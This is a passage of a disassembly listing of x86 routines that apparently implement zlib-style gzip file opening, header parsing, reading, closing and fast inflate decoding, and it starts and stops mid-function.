loc_9AF2F6: ; CODE XREF: sub_9AE1BD+1130�j
xor ecx, ecx
loc_9AF2F8: ; CODE XREF: sub_9AE1BD+1137�j
mov edx, [esi+4]
neg edx
sbb edx, edx
and edx, 40h
add edx, ecx
add edx, [esi+3Ch]
test eax, eax
mov [edi+2Ch], edx
jnz short loc_9AF312
test ebx, ebx
jz short loc_9AF318
loc_9AF312: ; CODE XREF: sub_9AE1BD+114F�j
cmp [ebp+arg_4], 4
jnz short loc_9AF325
loc_9AF318: ; CODE XREF: sub_9AE1BD+1153�j
cmp [ebp+var_24], 0
jnz short loc_9AF325
mov [ebp+var_24], 0FFFFFFFBh
loc_9AF325: ; CODE XREF: sub_9AE1BD+1159�j
; sub_9AE1BD+115F�j
mov eax, [ebp+var_24]
jmp loc_9AF20B
sub_9AE1BD endp
; ---------------------------------------------------------------------------
off_9AF32D dd offset loc_9AE234 ; DATA XREF: sub_9AE1BD:loc_9AE22D�r
dd offset loc_9AE37E
dd offset loc_9AE40D
dd offset loc_9AE47A
dd offset loc_9AE4CC
dd offset loc_9AE4E7
dd offset loc_9AE5E8
dd offset loc_9AE67B
dd offset loc_9AE70E
dd offset loc_9AE7BD
dd offset loc_9AE7F4
dd offset loc_9AE81D
dd offset loc_9AE827
dd offset loc_9AE8D7
dd offset loc_9AE93A
dd offset loc_9AE9AF
dd offset loc_9AEA55
dd offset loc_9AEC5C
dd offset loc_9AED27
dd offset loc_9AEEA5
dd offset loc_9AEEEB
dd offset loc_9AEFE8
dd offset loc_9AF04E
dd offset loc_9AF0DF
dd offset loc_9AF0F9
dd offset loc_9AF1B3
dd offset loc_9AF23B
dd offset loc_9AF244
dd offset loc_9AF296
; =============== S U B R O U T I N E =======================================
sub_9AF3A1 proc near ; CODE XREF: sub_9AF568+35�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9AF3DA
mov eax, [esi+1Ch]
test eax, eax
jz short loc_9AF3DA
mov ecx, [esi+24h]
test ecx, ecx
jz short loc_9AF3DA
mov eax, [eax+34h]
test eax, eax
jz short loc_9AF3C7
push eax
push dword ptr [esi+28h]
call ecx
pop ecx
pop ecx
loc_9AF3C7: ; CODE XREF: sub_9AF3A1+1C�j
push dword ptr [esi+1Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
and dword ptr [esi+1Ch], 0
pop ecx
pop ecx
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AF3DA: ; CODE XREF: sub_9AF3A1+7�j
; sub_9AF3A1+E�j ...
push 0FFFFFFFEh
pop eax
pop esi
retn
sub_9AF3A1 endp
; =============== S U B R O U T I N E =======================================
sub_9AF3DF proc near ; CODE XREF: sub_9AF43F+8A�p
; sub_9AF43F+91�p ...
cmp dword ptr [esi+3Ch], 0
jz short loc_9AF3E9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_9AF3E9: ; CODE XREF: sub_9AF3DF+4�j
cmp dword ptr [esi+4], 0
jnz short loc_9AF431
call dword_9A1160 ; _errno
and dword ptr [eax], 0
push dword ptr [esi+40h]
push 4000h
push 1
push dword ptr [esi+44h]
call dword_9A1168 ; fread
add esp, 10h
test eax, eax
mov [esi+4], eax
jnz short loc_9AF42C
mov ecx, [esi+40h]
mov dword ptr [esi+3Ch], 1
or eax, 0FFFFFFFFh
test byte ptr [ecx+0Ch], 20h
jz short locret_9AF43E
mov [esi+38h], eax
retn
; ---------------------------------------------------------------------------
loc_9AF42C: ; CODE XREF: sub_9AF3DF+34�j
mov eax, [esi+44h]
mov [esi], eax
loc_9AF431: ; CODE XREF: sub_9AF3DF+E�j
mov eax, [esi]
dec dword ptr [esi+4]
mov cl, [eax]
inc eax
mov [esi], eax
movzx eax, cl
locret_9AF43E: ; CODE XREF: sub_9AF3DF+47�j
retn
sub_9AF3DF endp
; =============== S U B R O U T I N E =======================================
sub_9AF43F proc near ; CODE XREF: sub_9AF64C+18D�p
; sub_9AF810+140�p
push ebx
push esi
mov esi, eax
xor ebx, ebx
push edi
mov edi, [esi+4]
inc ebx
cmp edi, 2
jnb short loc_9AF4AB
test edi, edi
jz short loc_9AF45C
mov eax, [esi]
mov ecx, [esi+44h]
mov al, [eax]
mov [ecx], al
loc_9AF45C: ; CODE XREF: sub_9AF43F+12�j
call dword_9A1160 ; _errno
and dword ptr [eax], 0
push dword ptr [esi+40h]
mov ecx, edi
mov eax, 4000h
sar eax, cl
push eax
mov eax, [esi+44h]
add eax, edi
push ebx
push eax
call dword_9A1168 ; fread
add esp, 10h
test eax, eax
jnz short loc_9AF493
mov ecx, [esi+40h]
test byte ptr [ecx+0Ch], 20h
jz short loc_9AF493
or dword ptr [esi+38h], 0FFFFFFFFh
loc_9AF493: ; CODE XREF: sub_9AF43F+45�j
; sub_9AF43F+4E�j
add [esi+4], eax
mov eax, [esi+4]
cmp eax, 2
mov ecx, [esi+44h]
mov [esi], ecx
jnb short loc_9AF4AB
mov [esi+58h], eax
jmp loc_9AF564
; ---------------------------------------------------------------------------
loc_9AF4AB: ; CODE XREF: sub_9AF43F+E�j
; sub_9AF43F+62�j
mov eax, [esi]
cmp byte ptr [eax], 1Fh
jnz loc_9AF561
cmp byte ptr [eax+1], 8Bh
jnz loc_9AF561
add dword ptr [esi+4], 0FFFFFFFEh
add eax, 2
mov [esi], eax
call sub_9AF3DF
mov edi, eax
call sub_9AF3DF
cmp edi, 8
mov ebx, eax
jnz short loc_9AF558
test bl, 0E0h
jnz short loc_9AF558
push 6
pop edi
loc_9AF4E4: ; CODE XREF: sub_9AF43F+AB�j
call sub_9AF3DF
dec edi
jnz short loc_9AF4E4
test bl, 4
jz short loc_9AF513
call sub_9AF3DF
mov edi, eax
call sub_9AF3DF
shl eax, 8
add edi, eax
loc_9AF502: ; CODE XREF: sub_9AF43F+D2�j
mov eax, edi
dec edi
test eax, eax
jz short loc_9AF513
call sub_9AF3DF
cmp eax, 0FFFFFFFFh
jnz short loc_9AF502
loc_9AF513: ; CODE XREF: sub_9AF43F+B0�j
; sub_9AF43F+C8�j
test bl, 8
jz short loc_9AF526
loc_9AF518: ; CODE XREF: sub_9AF43F+E5�j
call sub_9AF3DF
test eax, eax
jz short loc_9AF526
cmp eax, 0FFFFFFFFh
jnz short loc_9AF518
loc_9AF526: ; CODE XREF: sub_9AF43F+D7�j
; sub_9AF43F+E0�j
test bl, 10h
jz short loc_9AF539
loc_9AF52B: ; CODE XREF: sub_9AF43F+F8�j
call sub_9AF3DF
test eax, eax
jz short loc_9AF539
cmp eax, 0FFFFFFFFh
jnz short loc_9AF52B
loc_9AF539: ; CODE XREF: sub_9AF43F+EA�j
; sub_9AF43F+F3�j
test bl, 2
jz short loc_9AF549
push 2
pop edi
loc_9AF541: ; CODE XREF: sub_9AF43F+108�j
call sub_9AF3DF
dec edi
jnz short loc_9AF541
loc_9AF549: ; CODE XREF: sub_9AF43F+FD�j
mov eax, [esi+3Ch]
neg eax
sbb eax, eax
and eax, 0FFFFFFFDh
mov [esi+38h], eax
jmp short loc_9AF564
; ---------------------------------------------------------------------------
loc_9AF558: ; CODE XREF: sub_9AF43F+9B�j
; sub_9AF43F+A0�j
mov dword ptr [esi+38h], 0FFFFFFFDh
jmp short loc_9AF564
; ---------------------------------------------------------------------------
loc_9AF561: ; CODE XREF: sub_9AF43F+71�j
; sub_9AF43F+7B�j
mov [esi+58h], ebx
loc_9AF564: ; CODE XREF: sub_9AF43F+67�j
; sub_9AF43F+117�j ...
pop edi
pop esi
pop ebx
retn
sub_9AF43F endp
; =============== S U B R O U T I N E =======================================
sub_9AF568 proc near ; CODE XREF: sub_9AF631:loc_9AF645�p
; sub_9AF64C:loc_9AF7F2�p
push ebx
xor ebx, ebx
test esi, esi
jnz short loc_9AF574
push 0FFFFFFFEh
pop eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9AF574: ; CODE XREF: sub_9AF568+5�j
mov eax, [esi+50h]
test eax, eax
push edi
mov edi, dword_9A11D0
jz short loc_9AF586
push eax
call edi ; dword_9A11D0
pop ecx
loc_9AF586: ; CODE XREF: sub_9AF568+18�j
cmp dword ptr [esi+1Ch], 0
jz short loc_9AF5A5
mov al, [esi+5Ch]
cmp al, 77h
jnz short loc_9AF598
push 0FFFFFFFEh
pop ebx
jmp short loc_9AF5A5
; ---------------------------------------------------------------------------
loc_9AF598: ; CODE XREF: sub_9AF568+29�j
cmp al, 72h
jnz short loc_9AF5A5
push esi
call sub_9AF3A1
pop ecx
mov ebx, eax
loc_9AF5A5: ; CODE XREF: sub_9AF568+22�j
; sub_9AF568+2E�j ...
mov eax, [esi+40h]
test eax, eax
jz short loc_9AF5C6
push eax
call dword_9A1174 ; fclose
test eax, eax
pop ecx
jz short loc_9AF5C6
call dword_9A1160 ; _errno
cmp dword ptr [eax], 1Dh
jz short loc_9AF5C6
or ebx, 0FFFFFFFFh
loc_9AF5C6: ; CODE XREF: sub_9AF568+42�j
; sub_9AF568+4E�j ...
mov eax, [esi+38h]
test eax, eax
jge short loc_9AF5CF
mov ebx, eax
loc_9AF5CF: ; CODE XREF: sub_9AF568+63�j
mov eax, [esi+44h]
test eax, eax
jz short loc_9AF5DA
push eax
call edi ; dword_9A11D0
pop ecx
loc_9AF5DA: ; CODE XREF: sub_9AF568+6C�j
mov eax, [esi+48h]
test eax, eax
jz short loc_9AF5E5
push eax
call edi ; dword_9A11D0
pop ecx
loc_9AF5E5: ; CODE XREF: sub_9AF568+77�j
mov eax, [esi+54h]
test eax, eax
jz short loc_9AF5F0
push eax
call edi ; dword_9A11D0
pop ecx
loc_9AF5F0: ; CODE XREF: sub_9AF568+82�j
push esi
call edi ; dword_9A11D0
pop ecx
pop edi
mov eax, ebx
pop ebx
retn
sub_9AF568 endp
; =============== S U B R O U T I N E =======================================
sub_9AF5F9 proc near ; CODE XREF: sub_9AF810+12D�p
; sub_9AF810+139�p
push esi
push edi
mov esi, eax
call sub_9AF3DF
mov edi, eax
call sub_9AF3DF
shl eax, 8
add edi, eax
call sub_9AF3DF
shl eax, 10h
add edi, eax
call sub_9AF3DF
cmp eax, 0FFFFFFFFh
jnz short loc_9AF629
mov dword ptr [esi+38h], 0FFFFFFFDh
loc_9AF629: ; CODE XREF: sub_9AF5F9+27�j
shl eax, 18h
add eax, edi
pop edi
pop esi
retn
sub_9AF5F9 endp
; =============== S U B R O U T I N E =======================================
sub_9AF631 proc near ; CODE XREF: sub_9AC53D+40�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9AF640
cmp byte ptr [esi+5Ch], 77h
jnz short loc_9AF645
loc_9AF640: ; CODE XREF: sub_9AF631+7�j
push 0FFFFFFFEh
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AF645: ; CODE XREF: sub_9AF631+D�j
call sub_9AF568
pop esi
retn
sub_9AF631 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF64C proc near ; CODE XREF: sub_9AF7FE+A�p
var_58 = byte ptr -58h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ebx
push esi
lea ecx, [ebp+var_58]
push edi
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
jz loc_9AF7F7
cmp eax, ebx
jz loc_9AF7F7
mov edi, dword_9A11BC
push 74h
call edi ; dword_9A11BC
mov esi, eax
cmp esi, ebx
pop ecx
jz loc_9AF7F7
or dword ptr [esi+6Ch], 0FFFFFFFFh
push ebx
push ebx
push ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov [esi+28h], ebx
mov [esi+44h], ebx
mov [esi], ebx
mov [esi+48h], ebx
mov [esi+0Ch], ebx
mov [esi+10h], ebx
mov [esi+4], ebx
mov [esi+40h], ebx
mov [esi+38h], ebx
mov [esi+3Ch], ebx
mov [esi+64h], ebx
mov [esi+68h], ebx
call sub_9AD46B
push [ebp+arg_0]
mov [esi+4Ch], eax
mov [esi+50h], ebx
mov [esi+58h], ebx
call sub_9B322E ; strlen
inc eax
push eax
call edi ; dword_9A11BC
add esp, 14h
cmp eax, ebx
mov [esi+54h], eax
jz loc_9AF7F2
push [ebp+arg_0]
push eax
call sub_9B3348 ; strcpy
pop ecx
pop ecx
mov [esi+5Ch], bl
loc_9AF6EC: ; CODE XREF: sub_9AF64C+E6�j
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 72h
jnz short loc_9AF6F8
mov byte ptr [esi+5Ch], 72h
loc_9AF6F8: ; CODE XREF: sub_9AF64C+A6�j
mov al, [ecx]
cmp al, 77h
jz short loc_9AF702
cmp al, 61h
jnz short loc_9AF706
loc_9AF702: ; CODE XREF: sub_9AF64C+B0�j
mov byte ptr [esi+5Ch], 77h
loc_9AF706: ; CODE XREF: sub_9AF64C+B4�j
mov al, [ecx]
cmp al, 30h
jl short loc_9AF710
cmp al, 39h
jle short loc_9AF724
loc_9AF710: ; CODE XREF: sub_9AF64C+BE�j
cmp al, 66h
jz short loc_9AF724
cmp al, 68h
jz short loc_9AF724
cmp al, 52h
jz short loc_9AF724
mov edx, [ebp+var_4]
inc [ebp+var_4]
mov [edx], al
loc_9AF724: ; CODE XREF: sub_9AF64C+C2�j
; sub_9AF64C+C6�j ...
inc ecx
cmp al, bl
mov [ebp+var_8], ecx
jz short loc_9AF734
lea eax, [ebp+var_8]
cmp [ebp+var_4], eax
jnz short loc_9AF6EC
loc_9AF734: ; CODE XREF: sub_9AF64C+DE�j
mov al, [esi+5Ch]
cmp al, bl
jz loc_9AF7F2
cmp al, 77h
jz loc_9AF7F2
mov edi, 4000h
push edi
call dword_9A11BC ; malloc
push 38h
push offset dword_9A41AC
push 0FFFFFFF1h
push esi
mov [esi+44h], eax
mov [esi], eax
call sub_9AE031
add esp, 14h
test eax, eax
jnz loc_9AF7F2
cmp [esi+44h], ebx
jz short loc_9AF7F2
mov [esi+10h], edi
call dword_9A1160 ; _errno
cmp [ebp+arg_4], ebx
mov [eax], ebx
lea eax, [ebp+var_58]
push eax
jge short loc_9AF796
push [ebp+arg_0]
call dword_9A1170 ; fopen
jmp short loc_9AF79F
; ---------------------------------------------------------------------------
loc_9AF796: ; CODE XREF: sub_9AF64C+13D�j
push [ebp+arg_4]
call dword_9A114C ; _fdopen
loc_9AF79F: ; CODE XREF: sub_9AF64C+148�j
cmp eax, ebx
pop ecx
pop ecx
mov [esi+40h], eax
jz short loc_9AF7F2
cmp byte ptr [esi+5Ch], 77h
jnz short loc_9AF7D7
push 0Bh
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push 8
push 8Bh
push 1Fh
push offset aCCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c%c"
push eax
call dword_9A1150 ; fprintf
add esp, 30h
mov dword ptr [esi+60h], 0Ah
jmp short loc_9AF7EE
; ---------------------------------------------------------------------------
loc_9AF7D7: ; CODE XREF: sub_9AF64C+160�j
mov eax, esi
call sub_9AF43F
push dword ptr [esi+40h]
call dword_9A1154 ; ftell
sub eax, [esi+4]
pop ecx
mov [esi+60h], eax
loc_9AF7EE: ; CODE XREF: sub_9AF64C+189�j
mov eax, esi
jmp short loc_9AF7F9
; ---------------------------------------------------------------------------
loc_9AF7F2: ; CODE XREF: sub_9AF64C+8C�j
; sub_9AF64C+ED�j ...
call sub_9AF568
loc_9AF7F7: ; CODE XREF: sub_9AF64C+17�j
; sub_9AF64C+1F�j ...
xor eax, eax
loc_9AF7F9: ; CODE XREF: sub_9AF64C+1A4�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AF64C endp
; =============== S U B R O U T I N E =======================================
sub_9AF7FE proc near ; CODE XREF: sub_9AC53D+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 0FFFFFFFFh
push [esp+4+arg_0]
call sub_9AF64C
pop ecx
pop ecx
retn
sub_9AF7FE endp
; =============== S U B R O U T I N E =======================================
sub_9AF810 proc near ; CODE XREF: sub_9AC4A4+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
test esi, esi
push edi
mov [esp+10h+arg_4], eax
jz loc_9AFA30
cmp byte ptr [esi+5Ch], 72h
jnz loc_9AFA30
mov ecx, [esi+38h]
cmp ecx, 0FFFFFFFDh
jz loc_9AFA25
cmp ecx, 0FFFFFFFFh
jz loc_9AFA25
xor edx, edx
inc edx
cmp ecx, edx
jnz short loc_9AF855
xor eax, eax
jmp loc_9AFA33
; ---------------------------------------------------------------------------
loc_9AF855: ; CODE XREF: sub_9AF810+3C�j
mov ebp, [esp+10h+arg_8]
test ebp, ebp
mov ebx, eax
mov [esi+0Ch], eax
mov [esi+10h], ebp
jz short loc_9AF894
cmp dword ptr [esi+6Ch], 0FFFFFFFFh
jz short loc_9AF894
mov cl, [esi+6Ch]
mov [eax], cl
inc dword ptr [esi+0Ch]
dec dword ptr [esi+10h]
or dword ptr [esi+6Ch], 0FFFFFFFFh
inc dword ptr [esi+68h]
cmp dword ptr [esi+70h], 0
lea ebx, [eax+1]
mov [esp+10h+arg_4], ebx
jz short loc_9AF894
mov [esi+38h], edx
mov eax, edx
jmp loc_9AFA33
; ---------------------------------------------------------------------------
loc_9AF894: ; CODE XREF: sub_9AF810+53�j
; sub_9AF810+59�j ...
cmp dword ptr [esi+10h], 0
jz loc_9AF9F7
loc_9AF89E: ; CODE XREF: sub_9AF810+175�j
xor ecx, ecx
cmp [esi+58h], ecx
jnz loc_9AF996
cmp [esi+4], ecx
jnz short loc_9AF8F0
cmp [esi+3Ch], ecx
jnz short loc_9AF8F0
call dword_9A1160 ; _errno
and dword ptr [eax], 0
push dword ptr [esi+40h]
xor edi, edi
push 4000h
inc edi
push edi
push dword ptr [esi+44h]
call dword_9A1168 ; fread
add esp, 10h
test eax, eax
mov [esi+4], eax
jnz short loc_9AF8EB
mov eax, [esi+40h]
mov [esi+3Ch], edi
test byte ptr [eax+0Ch], 20h
jnz loc_9AF9F3
loc_9AF8EB: ; CODE XREF: sub_9AF810+C9�j
mov eax, [esi+44h]
mov [esi], eax
loc_9AF8F0: ; CODE XREF: sub_9AF810+9C�j
; sub_9AF810+A1�j
mov eax, [esi+4]
add [esi+64h], eax
mov eax, [esi+10h]
add [esi+68h], eax
push 0
push esi
call sub_9AE1BD
pop ecx
pop ecx
mov ecx, [esi+4]
sub [esi+64h], ecx
mov ecx, [esi+10h]
sub [esi+68h], ecx
cmp eax, 1
mov [esi+38h], eax
jnz short loc_9AF976
mov eax, [esi+0Ch]
sub eax, [esp+10h+arg_4]
push eax
push [esp+14h+arg_4]
push dword ptr [esi+4Ch]
call sub_9AD46B
mov [esi+4Ch], eax
mov eax, [esi+0Ch]
mov [esp+1Ch+arg_4], eax
add esp, 0Ch
mov eax, esi
call sub_9AF5F9
cmp eax, [esi+4Ch]
jnz short loc_9AF98D
mov eax, esi
call sub_9AF5F9
mov eax, esi
call sub_9AF43F
xor edi, edi
cmp [esi+38h], edi
jnz loc_9AF9F7
push esi
call sub_9ADFD6
push edi
push edi
push edi
call sub_9AD46B
add esp, 10h
mov [esi+4Ch], eax
jmp short loc_9AF978
; ---------------------------------------------------------------------------
loc_9AF976: ; CODE XREF: sub_9AF810+108�j
xor edi, edi
loc_9AF978: ; CODE XREF: sub_9AF810+164�j
cmp [esi+38h], edi
jnz short loc_9AF9F7
cmp [esi+3Ch], edi
jnz short loc_9AF9F7
cmp [esi+10h], edi
jnz loc_9AF89E
jmp short loc_9AF9F7
; ---------------------------------------------------------------------------
loc_9AF98D: ; CODE XREF: sub_9AF810+135�j
mov dword ptr [esi+38h], 0FFFFFFFDh
jmp short loc_9AF9F7
; ---------------------------------------------------------------------------
loc_9AF996: ; CODE XREF: sub_9AF810+93�j
mov edi, [esi+4]
mov eax, [esi+10h]
cmp edi, eax
jbe short loc_9AF9A2
mov edi, eax
loc_9AF9A2: ; CODE XREF: sub_9AF810+18E�j
cmp edi, ecx
jbe short loc_9AF9C1
push edi
push dword ptr [esi]
push dword ptr [esi+0Ch]
call sub_9B323A ; memcpy
add [esi], edi
sub [esi+10h], edi
add ebx, edi
add esp, 0Ch
sub [esi+4], edi
mov [esi+0Ch], ebx
loc_9AF9C1: ; CODE XREF: sub_9AF810+194�j
mov eax, [esi+10h]
test eax, eax
jbe short loc_9AF9DB
push dword ptr [esi+40h]
push eax
push 1
push ebx
call dword_9A1168 ; fread
add esp, 10h
sub [esi+10h], eax
loc_9AF9DB: ; CODE XREF: sub_9AF810+1B6�j
sub ebp, [esi+10h]
add [esi+64h], ebp
add [esi+68h], ebp
test ebp, ebp
jnz short loc_9AF9EF
mov dword ptr [esi+3Ch], 1
loc_9AF9EF: ; CODE XREF: sub_9AF810+1D6�j
mov eax, ebp
jmp short loc_9AFA33
; ---------------------------------------------------------------------------
loc_9AF9F3: ; CODE XREF: sub_9AF810+D5�j
or dword ptr [esi+38h], 0FFFFFFFFh
loc_9AF9F7: ; CODE XREF: sub_9AF810+88�j
; sub_9AF810+14A�j ...
mov eax, [esi+0Ch]
sub eax, [esp+10h+arg_4]
push eax
push [esp+14h+arg_4]
push dword ptr [esi+4Ch]
call sub_9AD46B
mov ecx, [esi+10h]
add esp, 0Ch
cmp ebp, ecx
mov [esi+4Ch], eax
jnz short loc_9AFA2A
mov esi, [esi+38h]
cmp esi, 0FFFFFFFDh
jz short loc_9AFA25
cmp esi, 0FFFFFFFFh
jnz short loc_9AFA2A
loc_9AFA25: ; CODE XREF: sub_9AF810+28�j
; sub_9AF810+31�j ...
or eax, 0FFFFFFFFh
jmp short loc_9AFA33
; ---------------------------------------------------------------------------
loc_9AFA2A: ; CODE XREF: sub_9AF810+206�j
; sub_9AF810+213�j
mov eax, ebp
sub eax, ecx
jmp short loc_9AFA33
; ---------------------------------------------------------------------------
loc_9AFA30: ; CODE XREF: sub_9AF810+12�j
; sub_9AF810+1C�j
push 0FFFFFFFEh
pop eax
loc_9AFA33: ; CODE XREF: sub_9AF810+40�j
; sub_9AF810+7F�j ...
pop edi
pop esi
pop ebp
pop ebx
retn
sub_9AF810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFA38 proc near ; CODE XREF: sub_9AE1BD+B9D�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov edx, [eax+10h]
push ebx
mov ebx, [eax]
dec ebx
lea ecx, [ecx+ebx-5]
mov [ebp+var_2C], ecx
mov ecx, edx
sub ecx, [ebp+arg_4]
push esi
mov esi, [eax+1Ch]
push edi
mov edi, [eax+0Ch]
dec edi
add ecx, edi
mov [ebp+var_3C], ecx
lea ecx, [edx+edi-101h]
mov [ebp+var_30], ecx
mov ecx, [esi+28h]
mov [ebp+var_24], ecx
mov ecx, [esi+2Ch]
mov [ebp+var_40], ecx
mov ecx, [esi+30h]
mov [ebp+var_18], ecx
mov ecx, [esi+34h]
mov [ebp+var_28], ecx
mov ecx, [esi+38h]
mov [ebp+var_4], ecx
mov ecx, [esi+3Ch]
mov [ebp+arg_4], ecx
mov ecx, [esi+4Ch]
xor edx, edx
mov [ebp+var_1C], ecx
mov ecx, [esi+50h]
inc edx
mov [ebp+var_20], ecx
mov ecx, [esi+54h]
shl edx, cl
mov ecx, [esi+58h]
dec edx
mov [ebp+var_34], edx
xor edx, edx
inc edx
shl edx, cl
dec edx
mov [ebp+var_38], edx
loc_9AFAB7: ; CODE XREF: sub_9AFA38+329�j
mov ecx, [ebp+arg_4]
cmp ecx, 0Fh
jnb short loc_9AFADC
add [ebp+arg_4], 8
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
mov ecx, [ebp+arg_4]
add [ebp+var_4], edx
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
add [ebp+var_4], edx
add [ebp+arg_4], 8
loc_9AFADC: ; CODE XREF: sub_9AFA38+85�j
mov ecx, [ebp+var_34]
and ecx, [ebp+var_4]
mov edx, [ebp+var_1C]
mov ecx, [edx+ecx*4]
jmp short loc_9AFB0D
; ---------------------------------------------------------------------------
loc_9AFAEA: ; CODE XREF: sub_9AFA38+EA�j
test cl, 10h
jnz short loc_9AFB2C
test cl, 40h
jnz loc_9AFD7B
xor edx, edx
inc edx
shl edx, cl
movzx ecx, word ptr [ebp+var_10+2]
dec edx
and edx, [ebp+var_4]
add edx, ecx
mov ecx, [ebp+var_1C]
mov ecx, [ecx+edx*4]
loc_9AFB0D: ; CODE XREF: sub_9AFA38+B0�j
mov [ebp-10h], ecx
movzx ecx, ch
shr [ebp+var_4], cl
sub [ebp+arg_4], ecx
mov [ebp+var_8], ecx
movzx ecx, byte ptr [ebp+var_10]
test ecx, ecx
jnz short loc_9AFAEA
mov cl, byte ptr [ebp+var_10+2]
jmp loc_9AFD56
; ---------------------------------------------------------------------------
loc_9AFB2C: ; CODE XREF: sub_9AFA38+B5�j
movzx edx, word ptr [ebp+var_10+2]
and ecx, 0Fh
mov [ebp+var_C], edx
mov [ebp+var_8], ecx
jz short loc_9AFB68
cmp [ebp+arg_4], ecx
jnb short loc_9AFB53
mov ecx, [ebp+arg_4]
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
mov ecx, [ebp+var_8]
add [ebp+var_4], edx
add [ebp+arg_4], 8
loc_9AFB53: ; CODE XREF: sub_9AFA38+106�j
xor edx, edx
inc edx
shl edx, cl
mov ecx, [ebp+var_8]
dec edx
and edx, [ebp+var_4]
shr [ebp+var_4], cl
add [ebp+var_C], edx
sub [ebp+arg_4], ecx
loc_9AFB68: ; CODE XREF: sub_9AFA38+101�j
mov ecx, [ebp+arg_4]
cmp ecx, 0Fh
jnb short loc_9AFB8D
add [ebp+arg_4], 8
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
mov ecx, [ebp+arg_4]
add [ebp+var_4], edx
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
add [ebp+var_4], edx
add [ebp+arg_4], 8
loc_9AFB8D: ; CODE XREF: sub_9AFA38+136�j
mov ecx, [ebp+var_38]
and ecx, [ebp+var_4]
mov edx, [ebp+var_20]
mov ecx, [edx+ecx*4]
jmp short loc_9AFBB9
; ---------------------------------------------------------------------------
loc_9AFB9B: ; CODE XREF: sub_9AFA38+197�j
test cl, 40h
jnz loc_9AFD72
xor edx, edx
inc edx
shl edx, cl
movzx ecx, word ptr [ebp+var_10+2]
dec edx
and edx, [ebp+var_4]
add edx, ecx
mov ecx, [ebp+var_20]
mov ecx, [ecx+edx*4]
loc_9AFBB9: ; CODE XREF: sub_9AFA38+161�j
mov [ebp+var_10], ecx
movzx ecx, ch
shr [ebp+var_4], cl
sub [ebp+arg_4], ecx
mov [ebp+var_8], ecx
movzx ecx, byte ptr [ebp+var_10]
test cl, 10h
jz short loc_9AFB9B
movzx edx, word ptr [ebp+var_10+2]
and ecx, 0Fh
cmp [ebp+arg_4], ecx
mov [ebp+var_14], edx
mov [ebp+var_8], ecx
jnb short loc_9AFC0E
mov ecx, [ebp+arg_4]
add [ebp+arg_4], 8
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
mov ecx, [ebp+var_8]
add [ebp+var_4], edx
cmp [ebp+arg_4], ecx
jnb short loc_9AFC0E
mov ecx, [ebp+arg_4]
inc ebx
movzx edx, byte ptr [ebx]
shl edx, cl
mov ecx, [ebp+var_8]
add [ebp+var_4], edx
add [ebp+arg_4], 8
loc_9AFC0E: ; CODE XREF: sub_9AFA38+1A9�j
; sub_9AFA38+1C1�j
xor edx, edx
inc edx
shl edx, cl
mov ecx, [ebp+var_8]
sub [ebp+arg_4], ecx
dec edx
and edx, [ebp+var_4]
shr [ebp+var_4], cl
add [ebp+var_14], edx
mov edx, [ebp+var_14]
mov ecx, edi
sub ecx, [ebp+var_3C]
cmp edx, ecx
jbe loc_9AFD21
sub edx, ecx
cmp edx, [ebp+var_40]
mov [ebp+var_8], edx
ja loc_9AFD69
mov ecx, [ebp+var_28]
dec ecx
mov [ebp+var_10], ecx
mov ecx, [ebp+var_18]
test ecx, ecx
jnz short loc_9AFC75
mov ecx, [ebp+var_24]
sub ecx, edx
add [ebp+var_10], ecx
mov ecx, edx
cmp ecx, [ebp+var_C]
jnb loc_9AFCEA
sub [ebp+var_C], ecx
mov ecx, [ebp+var_10]
loc_9AFC68: ; CODE XREF: sub_9AFA38+239�j
inc ecx
mov dl, [ecx]
inc edi
dec [ebp+var_8]
mov [edi], dl
jnz short loc_9AFC68
jmp short loc_9AFCE0
; ---------------------------------------------------------------------------
loc_9AFC75: ; CODE XREF: sub_9AFA38+215�j
cmp ecx, edx
jnb short loc_9AFCC2
sub ecx, edx
add ecx, [ebp+var_24]
add [ebp+var_10], ecx
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_18]
cmp ecx, [ebp+var_C]
jnb short loc_9AFCEA
sub [ebp+var_C], ecx
loc_9AFC8F: ; CODE XREF: sub_9AFA38+263�j
inc [ebp+var_10]
mov edx, [ebp+var_10]
mov dl, [edx]
inc edi
dec ecx
